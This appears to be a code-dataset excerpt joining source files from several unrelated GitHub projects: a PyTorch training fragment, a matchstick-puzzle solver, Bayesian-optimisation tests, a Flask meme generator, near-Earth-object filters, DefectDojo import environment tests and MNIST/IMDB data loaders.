print(f'\n\n --> Epoch ({split}): [{epoch}][{iter}/{num_batches}]')
print(utility.build_loss_string(average_loss))
return average_loss
def setup_inputs(self, sample: dict) -> Tensor:
self.copy_inputs(sample)
if not self.opt.refine:
self.generate_ms_inputs(sample)
network_input = self.input_image
else:
checkpoint = torch.load(self.opt.pred_dir)
model = checkpoint['model']
network_input = model.forward(self.input_image)[self.opt.ms_num-1]
network_input.insert(0, nn.functional.interpolate(
self.input_image, (512,512), mode='bicubic', align_corners=True))
return network_input
def copy_inputs(self, sample: dict) -> None:
del self.ref_images
del self.tar_images
del self.masks
del self.rhos
del self.flows
del self.input_image
self.input_image = torch.cuda.FloatTensor()
self.ref_images = torch.cuda.FloatTensor()
self.tar_images = torch.cuda.FloatTensor()
self.masks = torch.cuda.FloatTensor()
self.rhos = torch.cuda.FloatTensor()
self.flows = torch.cuda.FloatTensor()
n, c, h, w = list(sample['images'].size())
sh, sw = list(sample['input'].size()[2:])
self.input_image.resize_(n, 3, sh, sw).copy_(sample['input'])
self.ref_images.resize_(n, 3, h, w).copy_(sample['images'][:,:3,:,:])
self.tar_images.resize_(n, 3, h, w).copy_(sample['images'][:,3:,:,:])
self.masks.resize_(n, h, w).copy_(sample['masks'])
self.rhos.resize_(n, h, w).copy_(sample['rhos'])
self.flows.resize_(n, 3, h, w).copy_(sample['flows'])
def generate_ms_inputs(self, sample: dict) -> None:
multiscale_in = [self.ref_images, self.tar_images, self.rhos, self.masks, self.flows]
multiscale_out = self.multi_scale_data(multiscale_in)
self.multi_ref_images = multiscale_out[0]
self.multi_tar_images = multiscale_out[1]
self.multi_rhos = multiscale_out[2]
self.multi_masks = multiscale_out[3]
self.multi_flows = multiscale_out[4]
for i in range(self.opt.ms_num):
# rescale the loss weight for flow in different scale
ratio = 2 ** (self.opt.ms_num - i - 1)
self.multi_flows[i][:, 2, :] *= ratio
self.multi_masks[i] = self.multi_masks[i].unsqueeze(1)
self.multi_rhos[i] = self.multi_rhos[i].unsqueeze(1)
``` |
{
"source": "1at7/matchstick-puzzle",
"score": 4
} |
#### File: 1at7/matchstick-puzzle/solution.py
```python
def solution(eqn,map_matchsticks,all_,plus_one,zero,minus_one):
print("Given equation is : ",eqn)
first = int(eqn[0])
sign = eqn[1]
second = int(eqn[2])
third = int(eqn[4])
total_sticks = map_matchsticks[first]+map_matchsticks[sign]+map_matchsticks[second]+map_matchsticks[third]
choices_first = all_[first]
choices_second = all_[second]
choices_third = all_[third]
choices_sign = ["+","-"]
possible = []
added = 0
moved = 0
removed = 0
for i in choices_first:
for j in choices_second:
for k in choices_third:
for l in choices_sign:
sticks = map_matchsticks[i]+map_matchsticks[j]+map_matchsticks[k]+map_matchsticks[l]
if sticks == total_sticks:
try:
if i in plus_one[first]: added+=1
except:
pass
try:
if i in zero[first]: moved+=1
except:
pass
try:
if i in minus_one[first]: removed+=1
except:
pass
try:
if j in plus_one[second]: added+=1
except:
pass
try:
if j in zero[second]: moved+=1
except:
pass
try:
if j in minus_one[second]: removed+=1
except:
pass
try:
if k in plus_one[third]: added+=1
except:
pass
try:
if k in zero[third]: moved+=1
except:
pass
try:
if k in minus_one[third]: removed+=1
except:
pass
try:
if l in plus_one[sign]: added+=1
except:
pass
try:
if l in minus_one[sign]: removed+=1
except:
pass
#print(added, removed, '\t', [i,l,j,k])
if added==1 and removed==1 and moved==0:
possible.append([i,l,j,k])
elif moved==1 and removed==0 and added==0:
possible.append([i,l,j,k])
added=0
removed=0
moved=0
#print("Possible solutions : ",possible)
correct=0
for i in possible:
#print(i)
results = eval(str(i[0])+i[1]+str(i[2]))
if results==i[3]:
correct+=1
print("Corrected equation is : "+str(i[0])+i[1]+str(i[2])+"="+str(i[3]))
if correct==0:
print("No possible solution to equation for : ",eqn)
return None
map_matchsticks = {0:6,1:2,2:5,3:5,4:4,5:5,6:6,7:3,8:7,9:6,"+":2,"-":1}
plus_one = {0:[8],1:[7],2:[],3:[],4:[],5:[6,9],6:[8],7:[],8:[],9:[8],"-":["+"]}
zero = {0:[6,9],1:[],2:[3],3:[5,2],4:[],5:[3],6:[0,9],7:[],8:[],9:[0,6]}
#can_not = {4:4}
minus_one = {0:[],1:[],2:[],3:[],4:[],5:[],6:[5],7:[1],8:[0,9,6],9:[5,3],"+":["-"]}
all_ = {0:[0,6,9,8],1:[1,7],2:[2,3],3:[3,5,2],4:[4],5:[5,3,6,9],6:[6,0,5,8,9],7:[7,1],8:[8,0,6,9],9:[9,0,3,5,6,8]}
eqn_arr = []
eqn_arr.append("5+7=2") # 9 - 7 = 2
eqn_arr.append("4-1=6") # 4 + 1 = 5
eqn_arr.append("6+4=4") # 0 + 4 = 4 and 8 - 4 = 4
eqn_arr.append("6-2=1") # no solution
eqn_arr.append("6+8=8") # 8 + 0 = 8 or 0 + 8 = 8
eqn_arr.append("3+3=5") # 3+2=5 or 5+2=3
eqn_arr.append("5+9=9")
for i in eqn_arr:
solution(i, map_matchsticks, all_, plus_one, zero, minus_one)
``` |
{
"source": "1aut/BayesianOptimization",
"score": 2
} |
#### File: BayesianOptimization/tests/test_target_space.py
```python
import pytest
import numpy as np
from bayes_opt.target_space import TargetSpace
def target_func(**kwargs):
# arbitrary target func
return sum(kwargs.values())
PBOUNDS = {'p1': (0, 1), 'p2': (1, 100)}
def test_keys_and_bounds_in_same_order():
pbounds = {
'p1': (0, 1),
'p3': (0, 3),
'p2': (0, 2),
'p4': (0, 4),
}
space = TargetSpace(target_func, pbounds)
assert space.dim == len(pbounds)
assert space.empty
assert space.keys == ["p1", "p2", "p3", "p4"]
assert all(space.bounds[:, 0] == np.array([0, 0, 0, 0]))
assert all(space.bounds[:, 1] == np.array([1, 2, 3, 4]))
def test_params_to_array():
space = TargetSpace(target_func, PBOUNDS)
assert all(space.params_to_array({"p1": 2, "p2": 3}) == np.array([2, 3]))
assert all(space.params_to_array({"p2": 2, "p1": 9}) == np.array([9, 2]))
with pytest.raises(ValueError):
space.params_to_array({"p2": 1})
with pytest.raises(ValueError):
space.params_to_array({"p2": 1, "p1": 7, "other": 4})
with pytest.raises(ValueError):
space.params_to_array({"other": 1})
def test_array_to_params():
space = TargetSpace(target_func, PBOUNDS)
assert space.array_to_params(np.array([2, 3])) == {"p1": 2, "p2": 3}
with pytest.raises(ValueError):
space.array_to_params(np.array([2]))
with pytest.raises(ValueError):
space.array_to_params(np.array([2, 3, 5]))
def test_as_array():
space = TargetSpace(target_func, PBOUNDS)
x = space._as_array([0, 1])
assert x.shape == (2,)
assert all(x == np.array([0, 1]))
x = space._as_array({"p2": 1, "p1": 2})
assert x.shape == (2,)
assert all(x == np.array([2, 1]))
with pytest.raises(ValueError):
x = space._as_array([2, 1, 7])
with pytest.raises(ValueError):
x = space._as_array({"p2": 1, "p1": 2, "other": 7})
with pytest.raises(ValueError):
x = space._as_array({"p2": 1})
with pytest.raises(ValueError):
x = space._as_array({"other": 7})
def test_register():
space = TargetSpace(target_func, PBOUNDS)
assert len(space) == 0
# registering with dict
space.register(params={"p1": 1, "p2": 2}, target=3)
assert len(space) == 1
assert all(space.params[0] == np.array([1, 2]))
assert all(space.target == np.array([3]))
# registering with array
space.register(params={"p1": 5, "p2": 4}, target=9)
assert len(space) == 2
assert all(space.params[1] == np.array([5, 4]))
assert all(space.target == np.array([3, 9]))
with pytest.raises(KeyError):
space.register(params={"p1": 1, "p2": 2}, target=3)
with pytest.raises(KeyError):
space.register(params={"p1": 5, "p2": 4}, target=9)
def test_probe():
space = TargetSpace(target_func, PBOUNDS)
assert len(space) == 0
# probing with dict
space.probe(params={"p1": 1, "p2": 2})
assert len(space) == 1
assert all(space.params[0] == np.array([1, 2]))
assert all(space.target == np.array([3]))
# probing with array
space.probe(np.array([5, 4]))
assert len(space) == 2
assert all(space.params[1] == np.array([5, 4]))
assert all(space.target == np.array([3, 9]))
# probing same point with dict
space.probe(params={"p1": 1, "p2": 2})
assert len(space) == 2
assert all(space.params[1] == np.array([5, 4]))
assert all(space.target == np.array([3, 9]))
# probing same point with array
space.probe(np.array([5, 4]))
assert len(space) == 2
assert all(space.params[1] == np.array([5, 4]))
assert all(space.target == np.array([3, 9]))
def test_random_sample():
pbounds = {
'p1': (0, 1),
'p3': (0, 3),
'p2': (0, 2),
'p4': (0, 4),
}
space = TargetSpace(target_func, pbounds, random_state=8)
for _ in range(50):
random_sample = space.random_sample()
assert len(random_sample) == space.dim
assert all(random_sample >= space.bounds[:, 0])
assert all(random_sample <= space.bounds[:, 1])
def test_max():
space = TargetSpace(target_func, PBOUNDS)
assert space.max() == {}
space.probe(params={"p1": 1, "p2": 2})
space.probe(params={"p1": 5, "p2": 4})
space.probe(params={"p1": 2, "p2": 3})
space.probe(params={"p1": 1, "p2": 6})
assert space.max() == {"params": {"p1": 5, "p2": 4}, "target": 9}
def test_res():
space = TargetSpace(target_func, PBOUNDS)
assert space.res() == []
space.probe(params={"p1": 1, "p2": 2})
space.probe(params={"p1": 5, "p2": 4})
space.probe(params={"p1": 2, "p2": 3})
space.probe(params={"p1": 1, "p2": 6})
expected_res = [
{"params": {"p1": 1, "p2": 2}, "target": 3},
{"params": {"p1": 5, "p2": 4}, "target": 9},
{"params": {"p1": 2, "p2": 3}, "target": 5},
{"params": {"p1": 1, "p2": 6}, "target": 7},
]
assert len(space.res()) == 4
assert space.res() == expected_res
def test_set_bounds():
pbounds = {
'p1': (0, 1),
'p3': (0, 3),
'p2': (0, 2),
'p4': (0, 4),
}
space = TargetSpace(target_func, pbounds)
# Ignore unknown keys
space.set_bounds({"other": (7, 8)})
assert all(space.bounds[:, 0] == np.array([0, 0, 0, 0]))
assert all(space.bounds[:, 1] == np.array([1, 2, 3, 4]))
# Update bounds accordingly
space.set_bounds({"p2": (1, 8)})
assert all(space.bounds[:, 0] == np.array([0, 1, 0, 0]))
assert all(space.bounds[:, 1] == np.array([1, 8, 3, 4]))
if __name__ == '__main__':
r"""
CommandLine:
python tests/test_target_space.py
"""
pytest.main([__file__])
``` |
{
"source": "1ayham1/Data_Science-MemesGenerator",
"score": 3
} |
#### File: 1ayham1/Data_Science-MemesGenerator/app.py
```python
import random
import os
import requests
from flask import Flask, render_template, request
from MemeEngine import MemeEngine
from QuoteEngine import Ingestor
app = Flask(__name__)
meme = MemeEngine('./static')
def setup():
""" Load all resources """
quote_files = ['./_data/DogQuotes/DogQuotesTXT.txt',
'./_data/DogQuotes/DogQuotesDOCX.docx',
'./_data/DogQuotes/DogQuotesPDF.pdf',
'./_data/DogQuotes/DogQuotesCSV.csv']
quotes = []
for f in quote_files:
quotes.extend(Ingestor.parse(f))
images_path = "./_data/photos/dog/"
imgs = []
for root, dirs, files in os.walk(images_path):
imgs = [os.path.join(root, name) for name in files]
return quotes, imgs
quotes, imgs = setup()
@app.route('/')
def meme_rand():
""" Generate a random meme """
img = random.choice(imgs)
quote = random.choice(quotes)
out_path = meme.make_meme(img, quote.body, quote.author)
#return render_template('meme.html', path=out_path)
return render_template('meme.html', path=os.path.relpath(out_path))
@app.route('/create', methods=['GET'])
def meme_form():
""" User input for meme information """
return render_template('meme_form.html')
@app.route('/create', methods=['POST'])
def meme_post():
""" Create a user defined meme
Help was obtained from knowledge Area
"""
image_url = request.form['image_url']
img_request = requests.get(image_url, allow_redirects=True)
body = request.form['body']
author = request.form['author']
# form param to a temp local file.
tmp = f'./static/{random.randint(0, 1000000)}.jpg'
with open(tmp, 'wb') as img_file:
img_file.write(img_request.content)
# generate a meme using this temp file.
path = meme.make_meme(tmp, body, author)
# Remove the temporary saved image.
os.remove(tmp)
return render_template('meme.html', path=path)
if __name__ == "__main__":
app.run()
```
#### File: Data_Science-MemesGenerator/QuoteEngine/QuoteModel.py
```python
class QuoteModel:
def __init__(self, body: str, author: str) -> None:
"""initialization"""
self.body = body
self.author = author
def __repr__(self):
"""machine friendly object print"""
return f'<{self.body}, {self.author}'
``` |
{
"source": "1ayham1/PROG_Pyth-Exploring_NearEarthObjects",
"score": 3
} |
#### File: 1ayham1/PROG_Pyth-Exploring_NearEarthObjects/filters.py
```python
import operator
from itertools import islice
class UnsupportedCriterionError(NotImplementedError):
"""A filter criterion is unsupported."""
class AttributeFilter:
"""A general superclass for filters on comparable attributes.
An `AttributeFilter` represents the search criteria pattern comparing some
attribute of a close approach, or its attached NEO to a reference value. It
essentially functions as a callable predicate for whether a
`CloseApproach` object satisfies the encoded criterion.
It is constructed with a comparator operator and a reference value, and
calling the filter (with __call__) executes `get(approach) OP value` (in
infix notation).
Concrete subclasses can override the `get` classmethod to provide custom
behavior to fetch a desired attribute from the given `CloseApproach`.
"""
def __init__(self, op, value):
"""Construct a new `AttributeFilter` from a binary predicate and
a reference value.
The reference value will be supplied as the second (right-hand side)
argument to the operator function. For example, an `AttributeFilter`
with `op=operator.le` and `value=10` will, when called on an approach,
evaluate `some_attribute <= 10`.
- <=, ==, or >= - available as operator.le, operator.eq, and
operator.ge; i.e, operator.ge(a, b) is the same as a >= b.
:param op: A 2-argument predicate comparator (such as `operator.le`).
:param value: The reference value to compare against. It is supplied
by the user
at the command line and fed to create_filters by the main module.
"""
self.op = op
self.value = value
def __call__(self, approach):
"""Invoke self(approach)
The __call__ method makes instance objects of this type behave as
callables. With an instance of a subclass of AttributeFilter named f,
then the code f(approach) evaluates f.__call__(approach). Specifically,
"calling" the AttributeFilter with a CloseApproach object will get
the attribute of interest (self.get(approach)) and compare
it (via self.op) to the reference value (self.value), returning either
True or False, representing whether that close approach satisfiesthe
criterion.
"""
return self.op(self.get(approach), self.value)
@classmethod
def get(cls, approach):
"""Get an attribute of interest from a close approach.
Concrete subclasses must override this method to get an attribute of
interest from the supplied `CloseApproach`.
:param approach: A `CloseApproach` on which to evaluate this filter.
:return:
The value of an attribute of interest, comparable to
`self.value` via `self.op`.
"""
# one option is to make it also abstract
raise UnsupportedCriterionError # subclass of NotImplementedError
def __repr__(self):
return (
f"{self.__class__.__name__}(op=operator.{self.op.__name__},"
f" value={self.value})"
)
class DesignationFilter(AttributeFilter):
"""build an AttributeFilter that filtered on the designation attribute
of the NearEarthObject attached to a CloseApproach,
define a new subclass of AttributeFilter
(This is only an example & not needed because primary
designations are unique and we already have
NEODatabase.get_neo_by_designation).
"""
@classmethod
def get(cls, approach):
return approach.neo.designation
class DateFilters(AttributeFilter):
"""build an AttributeFilter that filtered on the Date attribute"""
@classmethod
def get(cls, approach):
"""
for an input time (date, start_date, end_date), return the
corrosponding approach.time and convert to date_time_obj
"""
return approach.time.date()
class DistanceFilters(AttributeFilter):
"""build an AttributeFilter that filtered on Distance attribute"""
@classmethod
def get(cls, approach):
"""
for an input distance (min,max), return the
corrosponding approach.distance
"""
return approach.distance
class VelocityFilters(AttributeFilter):
"""build an AttributeFilter that filtered on the velocity attribute"""
@classmethod
def get(cls, approach):
"""
for an input Velocity (min,max), return the
corrosponding approach.velocity
"""
return approach.velocity
class DiameterFilters(AttributeFilter):
"""build an AttributeFilter that filtered on diameter attribute"""
@classmethod
def get(cls, approach):
"""
for an input diameter (min,max), return the
corrosponding approach.neo.diameter
"""
return approach.neo.diameter
class HazardousFilter(AttributeFilter):
"""build an AttributeFilter that filtered on hazardous attribute"""
@classmethod
def get(cls, approach):
"""
for an input hazardous, return the
corrosponding approach.neo.hazardous only if hazardous is not None
"""
return approach.neo.hazardous
def create_filters(date=None, start_date=None, end_date=None,
distance_min=None, distance_max=None,
velocity_min=None, velocity_max=None,
diameter_min=None, diameter_max=None,
hazardous=None):
"""Create a collection of filters from user-specified criteria.
Each of these arguments is provided by the main module with a value
from the user's options at the command line. Each one corresponds to
a different type of filter. For example, the `--date` option corresponds
to the `date` argument, and represents a filter that selects close
approaches that occured on exactly that given date. Similarly,
the `--min-distance` option corresponds to the `distance_min` argument,
and represents a filter that selects close approaches whose nominal
approach distance is at least that far away from Earth. Each option
is `None` if not specified at the command
line (in particular, this means that the `--not-hazardous` flag results
in `hazardous=False`, not to be confused with `hazardous=None`).
The return value must be compatible with the `query` method of
`NEODatabase` because the main module directly passes this result
to that method. For now, this can be thought of as a collection of
`AttributeFilter`s.
:param date (datetime objects):
A `date` on which a matching `CloseApproach` occurs.
:param start_date:
A `date` on or after which a matching `CloseApproach` occurs.
:param end_date:
A `date` on or before which a matching `CloseApproach` occurs.
:param distance_min (float):
A min nominal approach distance for a matching `CloseApproach`.
:param distance_max (float):
A max nominal approach distance for a matching `CloseApproach`.
:param velocity_min (float):
A min relative approach velocity for a matching `CloseApproach`
:param velocity_max (float):
A max relative approach velocity for a matching `CloseApproach`
:param diameter_min (float):
A min diameter of the NEO of a matching `CloseApproach`.
:param diameter_max (float):
A maximum diameter of the NEO of a matching `CloseApproach`.
:param hazardous (bool):
if the NEO of a matching `CloseApproach` is potentially hazardous.
:return:
A collection of filters for use with `query`.
"""
filters_list = []
if date:
filters_list.append(DateFilters(operator.eq, date))
if start_date:
filters_list.append(DateFilters(operator.ge, start_date))
if end_date:
filters_list.append(DateFilters(operator.le, end_date))
if distance_min:
filters_list.append(DistanceFilters(operator.ge, distance_min))
if distance_max:
filters_list.append(DistanceFilters(operator.le, distance_max))
if velocity_min:
filters_list.append(VelocityFilters(operator.ge, velocity_min))
if velocity_max:
filters_list.append(VelocityFilters(operator.le, velocity_max))
if diameter_min:
filters_list.append(DiameterFilters(operator.ge, diameter_min))
if diameter_max:
filters_list.append(DiameterFilters(operator.le, diameter_max))
if hazardous is not None:
filters_list.append(HazardousFilter(operator.eq, hazardous))
return filters_list
def limit(iterator, n=None):
"""Produce a limited stream of values from an iterator.
If `n` is 0 or None, don't limit the iterator at all.
:param iterator: An iterator of values.
:param n: The maximum number of values to produce.
:yield: The first (at most) `n` values from the iterator.
"""
# don't limit the iterator at all
if n == 0 or n is None:
return iterator
# else return first n elements from iterator:
# https://stackoverflow.com/questions/26864008/simplest-way-to-get-the-first-n-elements-of-an-iterator
return list(islice(iterator, n))
``` |
{
"source": "1azunna/dd-import",
"score": 3
} |
#### File: dd-import/unittests/test_environment.py
```python
from unittest import TestCase
from unittest.mock import patch
from dd_import.environment import Environment
class TestEnvironment(TestCase):
def test_check_environment_reimport_findings_empty(self):
with self.assertRaises(Exception) as cm:
environment = Environment()
environment.check_environment_reimport_findings()
self.assertEqual('DD_URL is missing / DD_API_KEY is missing / DD_PRODUCT_TYPE_NAME is missing / DD_PRODUCT_NAME is missing / DD_ENGAGEMENT_NAME is missing / DD_TEST_NAME is missing / DD_TEST_TYPE_NAME is missing', str(cm.exception))
self.assertTrue(environment.active)
self.assertTrue(environment.verified)
self.assertFalse(environment.push_to_jira)
self.assertTrue(environment.close_old_findings)
@patch.dict('os.environ', {'DD_URL': 'url',
'DD_API_KEY': 'api_key',
'DD_PRODUCT_TYPE_NAME': 'product_type',
'DD_PRODUCT_NAME': 'product',
'DD_ENGAGEMENT_NAME': 'engagement',
'DD_TEST_NAME': 'test',
'DD_TEST_TYPE_NAME': 'test_type',
'DD_FILE_NAME': 'file_name',
'DD_ACTIVE': 'False',
'DD_VERIFIED': 'False',
'DD_MINIMUM_SEVERITY': 'minimum_severity',
'DD_PUSH_TO_JIRA': 'True',
'DD_CLOSE_OLD_FINDINGS': 'False',
'DD_VERSION': 'version',
'DD_ENDPOINT_ID': 'endpoint_id',
'DD_SERVICE': 'service',
'DD_BUILD_ID': 'build_id',
'DD_COMMIT_HASH': 'commit_hash',
'DD_BRANCH_TAG': 'branch_tag'})
def test_check_environment_reimport_findings_complete(self):
environment = Environment()
environment.check_environment_reimport_findings()
self.assertEqual(environment.url, 'url')
self.assertEqual(environment.api_key, 'api_key')
self.assertEqual(environment.product_type_name, 'product_type')
self.assertEqual(environment.product_name, 'product')
self.assertEqual(environment.engagement_name, 'engagement')
self.assertEqual(environment.test_name, 'test')
self.assertEqual(environment.test_type_name, 'test_type')
self.assertEqual(environment.file_name, 'file_name')
self.assertEqual(environment.url, 'url')
self.assertFalse(environment.active)
self.assertFalse(environment.verified)
self.assertEqual(environment.minimum_severity, 'minimum_severity')
self.assertTrue(environment.push_to_jira)
self.assertFalse(environment.close_old_findings)
self.assertEqual(environment.version, 'version')
self.assertEqual(environment.endpoint_id, 'endpoint_id')
self.assertEqual(environment.service, 'service')
self.assertEqual(environment.build_id, 'build_id')
self.assertEqual(environment.commit_hash, 'commit_hash')
self.assertEqual(environment.branch_tag, 'branch_tag')
def test_check_environment_languages_empty(self):
with self.assertRaises(Exception) as cm:
environment = Environment()
environment.check_environment_languages()
self.assertEqual('DD_URL is missing / DD_API_KEY is missing / DD_PRODUCT_TYPE_NAME is missing / DD_PRODUCT_NAME is missing / DD_FILE_NAME is missing', str(cm.exception))
self.assertTrue(environment.active)
self.assertTrue(environment.verified)
self.assertFalse(environment.push_to_jira)
self.assertTrue(environment.close_old_findings)
@patch.dict('os.environ', {'DD_URL': 'url',
'DD_API_KEY': 'api_key',
'DD_PRODUCT_TYPE_NAME': 'product_type',
'DD_PRODUCT_NAME': 'product',
'DD_FILE_NAME': 'file_name'})
def test_check_environment_languages_complete(self):
environment = Environment()
environment.check_environment_languages()
self.assertEqual(environment.url, 'url')
self.assertEqual(environment.api_key, 'api_key')
self.assertEqual(environment.product_type_name, 'product_type')
self.assertEqual(environment.product_name, 'product')
self.assertEqual(environment.file_name, 'file_name')
``` |
{
"source": "1b0325h/osu-skin",
"score": 3
} |
#### File: osu-skin/script/build.py
```python
import os
import glob
import shutil
from PIL import Image
def build():
def _name():
with open("../skin.ini", encoding="utf_8") as f:
for i in f.read().splitlines():
if i[:5] == "Name:":
return i.lstrip("Name: ")
else:
return "No_title"
def _ignore():
with open("../export/ignore.txt", encoding="utf_8") as f:
return f.read().splitlines()
def _copy(path, name):
for i in glob.glob(path):
shutil.copy(i, name)
name = _name()
ignore = _ignore()
os.mkdir(name)
shutil.copy("../skin.ini", name)
img = Image.new("RGBA", (1, 1), (0, 0, 0, 0))
for i in ignore:
img.save(f"{name}/{i}")
for path in ["../export/**/*.[pj][np]g", "../sound/*.[wm][ap][v3]"]:
_copy(path, name)
if __name__ == "__main__":
os.chdir(os.path.dirname(os.path.abspath(__file__)))
build()
``` |
{
"source": "1b15/OpenDataHackdays",
"score": 2
} |
#### File: OpenDataHackdays/walk-api/predict.py
```python
import json
import falcon
import random
from .model_prediction import get_predictions
class PredictResource(object):
def on_post(self, req, resp):
# example_query = {
# "usage": "work",
# "measures": [
# {
# "date": "2019-11-20",
# "counted": "1",
# "temperature": "25",
# "rain": "11"
# }, ...
# ]
# }
# print(req.media)
if req.media is None:
resp.body = json.dumps({})
resp.status = falcon.HTTP_400
return
query = req.media
mo,tu,we,th,fr,sa,su = get_predictions(
query['countingPoint']
)
example_response = {
"mo": round(mo),
"tu": round(tu),
"we": round(we),
"th": round(th),
"fr": round(fr),
"sa": round(sa),
"su": round(su),
"weekday": round((mo+tu+we+th+fr)/5),
"day": round((mo+tu+we+th+fr+sa+su)/7),
}
resp.body = json.dumps(example_response, ensure_ascii=False)
resp.status = falcon.HTTP_200
``` |
{
"source": "1Basile/Google_assistant_message_redirectior",
"score": 2
} |
#### File: 1Basile/Google_assistant_message_redirectior/Messages rederection.py
```python
import asyncio
from telethon import TelegramClient, events
bots = [1358259148, 1109485632]
bot = TelegramClient('session_name')
@bot.on(events.NewMessage(from_users=bots))
async def redirection(event):
print(event.raw_text)
if event.chat_id == 1109485632: # home_assistant_
message_id = await bot.send_message(1358259148, event.raw_text)
message_id = message_id.id
await bot.delete_messages(1358259148, message_id, revoke=True)
else:
message_id = await bot.send_message(1109485632, "bot: " + event.raw_text)
message_id = message_id.id
await bot.delete_messages(1109485632, message_id, revoke=True)
async def main():
while True:
await pass_function()
async def pass_function():
await asyncio.sleep(1)
if __name__ == '__main__':
with bot:
bot.loop.run_until_complete(main())
``` |
{
"source": "1bayezian/deep-net",
"score": 3
} |
#### File: 1bayezian/deep-net/data.py
```python
import numpy as np
from urllib import request
import gzip
import pickle
import os
def load_synth(num_train = 60_000, num_val = 10_000, seed = 0):
"""
Load some very basic synthetic data that should be easy to classify. Two features, so that we can plot the
decision boundary (which is an ellipse in the feature space).
:param num_train: Number of training instances
:param num_val: Number of test/validation instances
:param num_features: Number of features per instance
:return: Two tuples (xtrain, ytrain), (xval, yval) the training data is a floating point numpy array:
"""
np.random.seed(seed)
THRESHOLD = 0.6
quad = np.asarray([[1, 0.5], [1, .2]])
ntotal = num_train + num_val
x = np.random.randn(ntotal, 2)
# compute the quadratic form
q = np.einsum('bf, fk, bk -> b', x, quad, x)
y = (q > THRESHOLD).astype(np.int)
return (x[:num_train, :], y[:num_train]), (x[num_train:, :], y[num_train:]), 2
def load_mnist(final=False, flatten=True):
"""
Load the MNIST data
:param final: If true, return the canonical test/train split. If false, split some validation data from the training
data and keep the test data hidden.
:param flatten:
:return:
"""
if not os.path.isfile('mnist.pkl'):
init()
xtrain, ytrain, xtest, ytest = load()
xtl, xsl = xtrain.shape[0], xtest.shape[0]
if flatten:
xtrain = xtrain.reshape(xtl, -1)
xtest = xtest.reshape(xsl, -1)
if not final: # return the flattened images
return (xtrain[:-5000], ytrain[:-5000]), (xtrain[-5000:], ytrain[-5000:]), 10
return (xtrain, ytrain), (xtest, ytest), 10
# Numpy-only MNIST loader. Courtesy of <NAME>
# https://github.com/hsjeong5/MNIST-for-Numpy
filename = [
["training_images","train-images-idx3-ubyte.gz"],
["test_images","t10k-images-idx3-ubyte.gz"],
["training_labels","train-labels-idx1-ubyte.gz"],
["test_labels","t10k-labels-idx1-ubyte.gz"]
]
def download_mnist():
base_url = "http://yann.lecun.com/exdb/mnist/"
for name in filename:
print("Downloading "+name[1]+"...")
request.urlretrieve(base_url+name[1], name[1])
print("Download complete.")
def save_mnist():
mnist = {}
for name in filename[:2]:
with gzip.open(name[1], 'rb') as f:
mnist[name[0]] = np.frombuffer(f.read(), np.uint8, offset=16).reshape(-1,28*28)
for name in filename[-2:]:
with gzip.open(name[1], 'rb') as f:
mnist[name[0]] = np.frombuffer(f.read(), np.uint8, offset=8)
with open("mnist.pkl", 'wb') as f:
pickle.dump(mnist,f)
print("Save complete.")
def init():
download_mnist()
save_mnist()
def load():
with open("mnist.pkl",'rb') as f:
mnist = pickle.load(f)
return mnist["training_images"], mnist["training_labels"], mnist["test_images"], mnist["test_labels"]
# -- assignment 4 --
import wget, os, gzip, pickle, random, re, sys
IMDB_URL = 'http://dlvu.github.io/data/imdb.{}.pkl.gz'
IMDB_FILE = 'imdb.{}.pkl.gz'
PAD, START, END, UNK = '.pad', '.start', '.end', '.unk'
def load_imdb(final=False, val=5000, seed=0, voc=None, char=False):
cst = 'char' if char else 'word'
imdb_url = IMDB_URL.format(cst)
imdb_file = IMDB_FILE.format(cst)
if not os.path.exists(imdb_file):
wget.download(imdb_url)
with gzip.open(imdb_file) as file:
sequences, labels, i2w, w2i = pickle.load(file)
if voc is not None and voc < len(i2w):
nw_sequences = {}
i2w = i2w[:voc]
w2i = {w: i for i, w in enumerate(i2w)}
mx, unk = voc, w2i['.unk']
for key, seqs in sequences.items():
nw_sequences[key] = []
for seq in seqs:
seq = [s if s < mx else unk for s in seq]
nw_sequences[key].append(seq)
sequences = nw_sequences
if final:
return (sequences['train'], labels['train']), (sequences['test'], labels['test']), (i2w, w2i), 2
# Make a validation split
random.seed(seed)
x_train, y_train = [], []
x_val, y_val = [], []
val_ind = set( random.sample(range(len(sequences['train'])), k=val) )
for i, (s, l) in enumerate(zip(sequences['train'], labels['train'])):
if i in val_ind:
x_val.append(s)
y_val.append(l)
else:
x_train.append(s)
y_train.append(l)
return (x_train, y_train), \
(x_val, y_val), \
(i2w, w2i), 2
def gen_sentence(sent, g):
symb = '_[a-z]*'
while True:
match = re.search(symb, sent)
if match is None:
return sent
s = match.span()
sent = sent[:s[0]] + random.choice(g[sent[s[0]:s[1]]]) + sent[s[1]:]
def gen_dyck(p):
open = 1
sent = '('
while open > 0:
if random.random() < p:
sent += '('
open += 1
else:
sent += ')'
open -= 1
return sent
def gen_ndfa(p):
word = random.choice(['abc!', 'uvw!', 'klm!'])
s = ''
while True:
if random.random() < p:
return 's' + s + 's'
else:
s+= word
def load_brackets(n=50_000, seed=0):
return load_toy(n, char=True, seed=seed, name='dyck')
def load_ndfa(n=50_000, seed=0):
return load_toy(n, char=True, seed=seed, name='ndfa')
def load_toy(n=50_000, char=True, seed=0, name='lang'):
random.seed(0)
if name == 'lang':
sent = '_s'
toy = {
'_s': ['_s _adv', '_np _vp', '_np _vp _prep _np', '_np _vp ( _prep _np )', '_np _vp _con _s' , '_np _vp ( _con _s )'],
'_adv': ['briefly', 'quickly', 'impatiently'],
'_np': ['a _noun', 'the _noun', 'a _adj _noun', 'the _adj _noun'],
'_prep': ['on', 'with', 'to'],
'_con' : ['while', 'but'],
'_noun': ['mouse', 'bunny', 'cat', 'dog', 'man', 'woman', 'person'],
'_vp': ['walked', 'walks', 'ran', 'runs', 'goes', 'went'],
'_adj': ['short', 'quick', 'busy', 'nice', 'gorgeous']
}
sentences = [ gen_sentence(sent, toy) for _ in range(n)]
sentences.sort(key=lambda s : len(s))
elif name == 'dyck':
sentences = [gen_dyck(7./16.) for _ in range(n)]
sentences.sort(key=lambda s: len(s))
elif name == 'ndfa':
sentences = [gen_ndfa(1./4.) for _ in range(n)]
sentences.sort(key=lambda s: len(s))
else:
raise Exception(name)
tokens = set()
for s in sentences:
if char:
for c in s:
tokens.add(c)
else:
for w in s.split():
tokens.add(w)
i2t = [PAD, START, END, UNK] + list(tokens)
t2i = {t:i for i, t in enumerate(i2t)}
sequences = []
for s in sentences:
if char:
tok = list(s)
else:
tok = s.split()
sequences.append([t2i[t] for t in tok])
return sequences, (i2t, t2i)
```
#### File: deep-net/network/GenericNetwork.py
```python
from network.Activations import Activations
import numpy
import warnings
